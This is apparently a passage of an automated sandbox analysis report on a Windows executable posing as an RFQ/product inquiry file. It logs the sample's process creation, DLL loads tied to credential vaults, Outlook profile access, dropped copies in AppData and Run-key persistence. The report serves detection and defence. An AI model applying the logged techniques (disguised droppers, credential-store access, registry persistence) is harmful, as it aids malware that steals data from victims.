            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeReversingLabs: Detection: 18%
            Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeVirustotal: Detection: 16%
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeFile read: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe "C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe"
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess created: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe "C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe "C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe"
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess created: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe "C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe "C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe"
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1952 -s 1156
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess created: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe "C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess created: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe "C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe" Jump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
            Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, 00000002.00000002.111733816119.000000006A7E0000.00000020.00000001.01000000.0000000C.sdmp
            Source: Binary string: System.Management.pdb source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, 00000002.00000002.111733816119.000000006A7E0000.00000020.00000001.01000000.0000000C.sdmp
            Source: Binary string: System.Management.ni.pdb source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, 00000002.00000002.111733816119.000000006A7E0000.00000020.00000001.01000000.0000000C.sdmp

            Data Obfuscation

            barindex
            Source: Yara matchFile source: Process Memory Space: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe PID: 5960, type: MEMORYSTR
            Source: Yara matchFile source: 00000004.00000002.107397454848.0000000009E7B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.106940804985.0000000009E6B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 2_2_0011A30C push 8BFFFFF7h; ret 2_2_0011A312
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 2_2_00110C95 push edi; ret 2_2_00110CC2
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeCode function: 5_2_00155C38 push esp; ret 5_2_00155C49
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeCode function: 5_2_00150C95 push edi; ret 5_2_00150CC2
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeCode function: 5_2_3A900EF3 push esp; ret 5_2_3A900EF5
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeFile created: C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeFile created: C:\Users\user\AppData\Local\Temp\nsiFB67.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeFile created: C:\Users\user\AppData\Roaming\Outgaming\Henequin.exeJump to dropped file
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeFile created: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeJump to dropped file
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeFile created: C:\Users\user\AppData\Local\Temp\nsn397A.tmp\System.dllJump to dropped file

            Boot Survival

            barindex
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vexplorersJump to behavior
